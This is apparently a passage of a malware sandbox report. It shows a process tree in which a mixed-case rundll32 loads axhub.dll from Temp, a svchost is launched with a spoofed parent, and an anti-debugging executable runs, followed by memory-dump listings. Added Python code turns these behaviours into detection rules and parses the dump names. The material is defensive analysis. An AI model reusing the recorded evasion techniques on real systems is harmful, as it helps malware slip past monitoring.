                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:6812
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:7584
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\rUNdlL32.eXe
  rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
  1⤵
  • Process spawned unexpected child process
  PID:10328
  • C:\Windows\SysWOW64\rundll32.exe
    rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
    2⤵
    • Modifies registry class
    PID:6096
• C:\Windows\system32\rUNdlL32.eXe
  rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
  1⤵
  • Process spawned unexpected child process
  PID:11256
  • C:\Windows\SysWOW64\rundll32.exe
    rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
    2⤵
    PID:9460
• \??\c:\windows\system32\svchost.exe
  c:\windows\system32\svchost.exe -k netsvcs -s seclogon
  1⤵
  • Suspicious use of NtCreateUserProcessOtherParentProcess
  PID:10120
• C:\Users\Admin\AppData\Local\Temp\151E.exe
  C:\Users\Admin\AppData\Local\Temp\151E.exe
  1⤵
  • Checks BIOS information in registry
  • Checks whether UAC is enabled
  • Suspicious use of NtSetInformationThreadHideFromDebugger
  PID:7764
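The rundll32 and svchost entries in the tree above are the ones a detection engineer would want to turn into rules: rundll32 spelled in mixed case (Windows resolves the name case-insensitively, so the odd casing only serves to dodge case-sensitive string matches), rundll32 loading a DLL out of the user's Temp directory, an executable running from Temp, and a service host created with an explicit (other) parent process. The Python below is an added example, not part of the sandbox report. Its event records are constructed to mirror the tree, the field names (pid, image, command_line, parent_pid, creator_pid) are an assumed Sysmon-like schema rather than a real log format, and the parent and creator PIDs given for svchost.exe and 151E.exe are assumptions, since the report does not show who launched them.

```python
"""Detection logic for the process-tree behaviour above (added example, not part of
the sandbox report; event schema and the svchost/151E parent PIDs are assumptions)."""
import ntpath
import re

# Directories a standard user can write to; a starting list, not exhaustive.
USER_WRITABLE = re.compile(
    r"\\(AppData\\Local\\Temp|AppData\\Roaming|Users\\Public|ProgramData|Windows\\Temp)\\",
    re.IGNORECASE,
)

# First token of a Windows command line (quoted or bare), and the token after it
# up to a comma, which for rundll32 is the DLL path before ",export".
_FIRST_TOKEN = re.compile(r'^\s*(?:"(?P<q>[^"]+)"|(?P<u>\S+))')
_SECOND_TOKEN = re.compile(r'^\s*(?:"[^"]+"|\S+)\s+(?:"(?P<q>[^"]+)"|(?P<u>[^,\s]+))')


def first_token(command_line):
    m = _FIRST_TOKEN.match(command_line)
    return (m.group("q") or m.group("u")) if m else None


def rundll32_target(command_line):
    """Return the DLL path rundll32 was asked to load, or None if not parseable."""
    m = _SECOND_TOKEN.match(command_line)
    return (m.group("q") or m.group("u")) if m else None


def analyse(events):
    """Map each pid to the list of findings raised for its process-creation event."""
    by_pid = {e["pid"]: e for e in events}
    results = {}
    for e in events:
        findings = []
        image_name = ntpath.basename(e["image"]).lower()
        tok_name = ntpath.basename(first_token(e["command_line"]) or "")

        # rUNdlL32.eXe runs exactly like rundll32.exe; the spelling exists only to
        # slip past detections that compare the string case-sensitively.
        if tok_name.lower() == "rundll32.exe" and tok_name != "rundll32.exe":
            findings.append(f"rundll32 invoked with non-canonical casing: {tok_name}")

        if image_name == "rundll32.exe":
            target = rundll32_target(e["command_line"])
            if target and USER_WRITABLE.search(target):
                findings.append(f"rundll32 loads DLL from user-writable path: {target}")

        if USER_WRITABLE.search(e["image"]):
            findings.append(f"process image in user-writable path: {e['image']}")

        # A recorded parent that differs from the process that actually called the
        # create-process API is the footprint of an explicit-parent launch, which is
        # what the report's NtCreateUserProcessOtherParentProcess signature denotes.
        pp, cp = e.get("parent_pid"), e.get("creator_pid")
        if pp is not None and cp is not None and pp != cp:
            findings.append(f"recorded parent {pp} differs from creating process {cp}")

        # Service hosts are normally started by services.exe.
        if image_name == "svchost.exe" and cp in by_pid:
            creator = ntpath.basename(by_pid[cp]["image"]).lower()
            if creator != "services.exe":
                findings.append(f"svchost.exe created by {creator} instead of services.exe")

        results[e["pid"]] = findings
    return results


# Constructed from the tree above. The parent of the top-level rundll32 is not shown
# in the report (None); the PIDs 700 and 4321 and the svchost creator are assumed.
EVENTS = [
    {"pid": 10328, "image": r"C:\Windows\system32\rUNdlL32.eXe",
     "command_line": r'rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main',
     "parent_pid": None, "creator_pid": None},
    {"pid": 6096, "image": r"C:\Windows\SysWOW64\rundll32.exe",
     "command_line": r'rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main',
     "parent_pid": 10328, "creator_pid": 10328},
    {"pid": 10120, "image": r"c:\windows\system32\svchost.exe",
     "command_line": r"c:\windows\system32\svchost.exe -k netsvcs -s seclogon",
     "parent_pid": 700, "creator_pid": 7764},
    {"pid": 7764, "image": r"C:\Users\Admin\AppData\Local\Temp\151E.exe",
     "command_line": r"C:\Users\Admin\AppData\Local\Temp\151E.exe",
     "parent_pid": 4321, "creator_pid": 4321},
]

if __name__ == "__main__":
    for pid, findings in analyse(EVENTS).items():
        for f in findings:
            print(f"{pid}: {f}")
```

Both rundll32 entries raise the same two findings because the SysWOW64 copy is rundll32 re-executing itself for a 32-bit DLL with the command line unchanged; count the pair as one alert. The explicit-parent rule only works when the telemetry records the creating process separately from the recorded parent; without that field a spoofed parent looks like a normal parent-child relationship.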

Network

MITRE ATT&CK Enterprise v6

Downloads

• memory/860-186-0x0000000000400000-0x00000000008F2000-memory.dmp (Filesize 4.9MB)
• memory/860-191-0x0000000000A10000-0x0000000000B5A000-memory.dmp (Filesize 1.3MB)
• memory/1016-431-0x000001AE9FC20000-0x000001AE9FC91000-memory.dmp (Filesize 452KB)
• memory/1016-220-0x000001AE9FB00000-0x000001AE9FB71000-memory.dmp (Filesize 452KB)
• memory/1028-227-0x0000024F9F310000-0x0000024F9F381000-memory.dmp (Filesize 452KB)
• memory/1144-449-0x00000155B3070000-0x00000155B30E1000-memory.dmp (Filesize 452KB)
• memory/1144-234-0x00000155B2E20000-0x00000155B2E91000-memory.dmp (Filesize 452KB)
• memory/1196-262-0x0000018854A40000-0x0000018854AB1000-memory.dmp (Filesize 452KB)
• memory/1360-187-0x0000000000400000-0x0000000000896000-memory.dmp (Filesize 4.6MB)
• memory/1360-195-0x0000000000030000-0x0000000000039000-memory.dmp (Filesize 36KB)
• memory/1380-270-0x000002DE02D70000-0x000002DE02DE1000-memory.dmp (Filesize 452KB)
• memory/1460-446-0x000001B93F2F0000-0x000001B93F361000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      452KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/1460-252-0x000001B93F270000-0x000001B93F2E1000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      452KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/1592-382-0x0000000000400000-0x00000000004A1000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      644KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/1936-260-0x0000025C9CE40000-0x0000025C9CEB1000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      452KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/1936-452-0x0000025C9CF80000-0x0000025C9CFF1000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      452KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/2196-340-0x0000000000400000-0x000000000064F000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      2.3MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/2200-455-0x0000000000400000-0x00000000008EC000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      4.9MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/2224-385-0x00000000054F0000-0x0000000005AF6000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      6.0MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/2312-438-0x0000000000400000-0x00000000008A2000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      4.6MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/2312-451-0x00000000008B0000-0x00000000009FA000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      1.3MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/2472-232-0x00000239DFCB0000-0x00000239DFD21000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      452KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/2472-429-0x00000239DFDA0000-0x00000239DFE11000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      452KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/2528-420-0x0000022FCA160000-0x0000022FCA1D1000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      452KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/2528-223-0x0000022FCA010000-0x0000022FCA081000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      452KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/2780-271-0x0000020995840000-0x00000209958B1000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      452KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/2800-272-0x000002530BA60000-0x000002530BAD1000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      452KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/2808-439-0x0000000000400000-0x000000000044E000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      312KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/2868-417-0x00000200027B0000-0x0000020002821000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      452KB

• memory/2868-197-0x0000020002220000-0x0000020002291000-memory.dmp, Filesize 452KB
• memory/3060-273-0x0000000002400000-0x0000000002415000-memory.dmp, Filesize 84KB
• memory/3092-400-0x0000022DF6700000-0x0000022DF6771000-memory.dmp, Filesize 452KB
• memory/3092-399-0x0000022DF6430000-0x0000022DF647C000-memory.dmp, Filesize 304KB
• memory/3092-184-0x0000022DF63E0000-0x0000022DF642C000-memory.dmp, Filesize 304KB
• memory/3092-198-0x0000022DF64A0000-0x0000022DF6511000-memory.dmp, Filesize 452KB
• memory/3532-162-0x0000000000140000-0x0000000000141000-memory.dmp, Filesize 4KB
• memory/3532-169-0x000000001AE10000-0x000000001AE12000-memory.dmp, Filesize 8KB
• memory/3768-153-0x0000000064940000-0x0000000064959000-memory.dmp, Filesize 100KB
• memory/3768-151-0x0000000064940000-0x0000000064959000-memory.dmp, Filesize 100KB
• memory/3768-156-0x0000000064940000-0x0000000064959000-memory.dmp, Filesize 100KB
• memory/3768-133-0x000000006B280000-0x000000006B2A6000-memory.dmp, Filesize 152KB
• memory/3768-160-0x0000000064940000-0x0000000064959000-memory.dmp, Filesize 100KB
• memory/3768-134-0x0000000000400000-0x000000000051D000-memory.dmp, Filesize 1.1MB
• memory/3768-132-0x000000006FE40000-0x000000006FFC6000-memory.dmp, Filesize 1.5MB
• memory/3768-131-0x000000006B440000-0x000000006B4CF000-memory.dmp, Filesize 572KB
• memory/3776-441-0x0000000064940000-0x0000000064959000-memory.dmp, Filesize 100KB
• memory/4232-255-0x000001CA62DC0000-0x000001CA62DC1000-memory.dmp, Filesize 4KB
• memory/4240-355-0x00000000776C0000-0x000000007784E000-memory.dmp, Filesize 1.6MB
• memory/4240-387-0x0000000005500000-0x0000000005501000-memory.dmp, Filesize 4KB
• memory/4260-188-0x0000000004210000-0x000000000426D000-memory.dmp, Filesize 372KB
• memory/4260-182-0x00000000042A9000-0x00000000043AA000-memory.dmp, Filesize 1.0MB
• memory/4296-179-0x0000000000CA0000-0x0000000000CA1000-memory.dmp, Filesize 4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4300-308-0x00000000055E0000-0x00000000055E1000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4300-356-0x0000000005770000-0x000000000577F000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      60KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4300-297-0x0000000000C40000-0x0000000000C41000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4424-335-0x0000000004C40000-0x0000000004C5C000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      112KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4424-307-0x00000000001A0000-0x00000000001A1000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4424-313-0x0000000004A80000-0x0000000004A81000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4428-199-0x0000021B16600000-0x0000021B16671000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      452KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4504-311-0x0000000005340000-0x0000000005946000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      6.0MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4504-300-0x0000000005380000-0x0000000005381000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4504-303-0x00000000053E0000-0x00000000053E1000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4504-333-0x0000000005F60000-0x0000000005F61000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4504-298-0x0000000005950000-0x0000000005951000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4504-282-0x0000000000400000-0x000000000041E000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      120KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4504-312-0x0000000005420000-0x0000000005421000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4516-395-0x00000000044E9000-0x00000000045EA000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      1.0MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4516-401-0x00000000043C0000-0x000000000441D000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      372KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4548-453-0x0000000000400000-0x00000000008A8000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      4.7MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • memory/4668-226-0x0000000000F40000-0x0000000000F41000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Filesize

4KB

• memory/4668-257-0x00000000058D0000-0x00000000058D1000-memory.dmp (Filesize 4KB)
• memory/4668-245-0x00000000031C0000-0x00000000031C1000-memory.dmp (Filesize 4KB)
• memory/4668-235-0x0000000005780000-0x0000000005781000-memory.dmp (Filesize 4KB)
• memory/4716-444-0x0000000000AF0000-0x0000000000B37000-memory.dmp (Filesize 284KB)
• memory/4744-315-0x0000000004F20000-0x0000000004F21000-memory.dmp (Filesize 4KB)
• memory/4744-301-0x0000000000500000-0x0000000000501000-memory.dmp (Filesize 4KB)
• memory/4744-216-0x0000000000950000-0x0000000000A34000-memory.dmp (Filesize 912KB)
• memory/4796-360-0x0000000004AB0000-0x0000000004AB1000-memory.dmp (Filesize 4KB)
• memory/4796-344-0x00000000000F0000-0x00000000000F1000-memory.dmp (Filesize 4KB)
• memory/4804-422-0x0000000002F60000-0x0000000002F72000-memory.dmp (Filesize 72KB)
• memory/4828-346-0x0000000000B90000-0x0000000000BBE000-memory.dmp (Filesize 184KB)
• memory/4828-349-0x0000000000400000-0x00000000009BE000-memory.dmp (Filesize 5.7MB)
• memory/4896-434-0x000001DF1F1C0000-0x000001DF1F291000-memory.dmp (Filesize 836KB)
• memory/4896-433-0x000001DF1D540000-0x000001DF1D5AF000-memory.dmp (Filesize 444KB)
• memory/4936-358-0x0000000005510000-0x0000000005B16000-memory.dmp (Filesize 6.0MB)
• memory/4936-331-0x0000000000400000-0x000000000041E000-memory.dmp (Filesize 120KB)
• memory/4968-426-0x00000000056B0000-0x0000000005CB6000-memory.dmp (Filesize 6.0MB)
• memory/5076-374-0x00000000055C0000-0x00000000055C1000-memory.dmp (Filesize 4KB)
• memory/5076-351-0x0000000000B10000-0x0000000000B11000-memory.dmp (Filesize 4KB)
• memory/5092-321-0x00000000058C0000-0x00000000058C1000-memory.dmp (Filesize 4KB)
• memory/5092-306-0x0000000000F60000-0x0000000000F61000-memory.dmp (Filesize 4KB)
• memory/5096-243-0x0000000000400000-0x00000000004E4000-memory.dmp (Filesize 912KB)
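The dump names in this listing follow the sandbox's memory/pid-seq-start-end-memory.dmp scheme, so the printed Filesize can be recomputed from the address range. The Python below is an added example, not part of the report and not the sandbox's own tooling: it parses the names, recomputes each region's size, checks it against the size shown in the listing, marks regions that lie above 4 GiB (only possible in a 64-bit process), and flags dumps starting at the PE32 default image base 0x400000 as the ones to carve for a PE header first. The dump list is a constructed subset of the entries on this page; the helper and field names are assumptions.

```python
import re
from collections import defaultdict

# Constructed subset of the dump names on this page, paired with the
# Filesize printed next to each one in the report.
LISTED_DUMPS = [
    ("memory/4668-257-0x00000000058D0000-0x00000000058D1000-memory.dmp", "4KB"),
    ("memory/4716-444-0x0000000000AF0000-0x0000000000B37000-memory.dmp", "284KB"),
    ("memory/4744-216-0x0000000000950000-0x0000000000A34000-memory.dmp", "912KB"),
    ("memory/4804-422-0x0000000002F60000-0x0000000002F72000-memory.dmp", "72KB"),
    ("memory/4828-349-0x0000000000400000-0x00000000009BE000-memory.dmp", "5.7MB"),
    ("memory/4896-434-0x000001DF1F1C0000-0x000001DF1F291000-memory.dmp", "836KB"),
    ("memory/4936-331-0x0000000000400000-0x000000000041E000-memory.dmp", "120KB"),
    ("memory/4968-426-0x00000000056B0000-0x0000000005CB6000-memory.dmp", "6.0MB"),
    ("memory/5096-243-0x0000000000400000-0x00000000004E4000-memory.dmp", "912KB"),
]

# memory/<pid>-<seq>-0x<start>-0x<end>-memory.dmp, as seen in the listing.
DUMP_NAME_RE = re.compile(
    r"^memory/(?P<pid>\d+)-(?P<seq>\d+)"
    r"-0x(?P<start>[0-9A-Fa-f]+)-0x(?P<end>[0-9A-Fa-f]+)-memory\.dmp$"
)

# Default image base of 32-bit PE executables; a dump that starts here usually
# covers a whole mapped image rather than a small heap or stack region.
PE32_DEFAULT_IMAGE_BASE = 0x400000
PAGE_SIZE = 0x1000


def parse_dump_name(name):
    """Split a dump file name into pid, sequence number and address range."""
    m = DUMP_NAME_RE.match(name)
    if m is None:
        raise ValueError(f"not a memory dump name: {name!r}")
    start, end = int(m["start"], 16), int(m["end"], 16)
    # Region dumps are page granular; anything else is a malformed name.
    if end <= start or start % PAGE_SIZE or end % PAGE_SIZE:
        raise ValueError(f"implausible region bounds in {name!r}")
    return {
        "pid": int(m["pid"]),
        "seq": int(m["seq"]),
        "start": start,
        "end": end,
        "size": end - start,
        # Addresses above 4 GiB can only exist in a 64-bit address space.
        "x64": end > 0xFFFFFFFF,
        "image_base_candidate": start == PE32_DEFAULT_IMAGE_BASE,
    }


def human_size(n):
    """Format bytes the way the report does: whole KB below 1 MiB, one decimal MB above."""
    if n >= 1 << 20:
        return f"{n / (1 << 20):.1f}MB"
    return f"{max(1, n // 1024)}KB"


def check_listed_sizes(listed):
    """Return (name, shown, computed) for entries whose printed size disagrees
    with the size implied by the address range in the file name."""
    mismatches = []
    for name, shown in listed:
        computed = human_size(parse_dump_name(name)["size"])
        if computed != shown:
            mismatches.append((name, shown, computed))
    return mismatches


def summarize_by_pid(names):
    """Per PID: region count, total bytes dumped, 64-bit evidence, and the
    full-image candidates worth carving for a PE header first."""
    summary = defaultdict(
        lambda: {"regions": 0, "bytes": 0, "x64": False, "carve_first": []}
    )
    for name in names:
        r = parse_dump_name(name)
        s = summary[r["pid"]]
        s["regions"] += 1
        s["bytes"] += r["size"]
        s["x64"] = s["x64"] or r["x64"]
        if r["image_base_candidate"]:
            s["carve_first"].append(name)
    return dict(summary)


if __name__ == "__main__":
    print("size mismatches:", check_listed_sizes(LISTED_DUMPS) or "none")
    for pid, s in sorted(summarize_by_pid([n for n, _ in LISTED_DUMPS]).items()):
        arch = "64-bit" if s["x64"] else "unknown"
        print(f"pid {pid}: {s['regions']} region(s), {human_size(s['bytes'])}, {arch}")
        for n in s["carve_first"]:
            print("   carve first:", n)
```

Run against the full listing, the size check should come back empty; a mismatch would mean the name or the printed size was corrupted on the way into the report. The 0x400000 heuristic only points at likely 32-bit image dumps, so the 64-bit regions (PID 4896 here) still need to be inspected by hand.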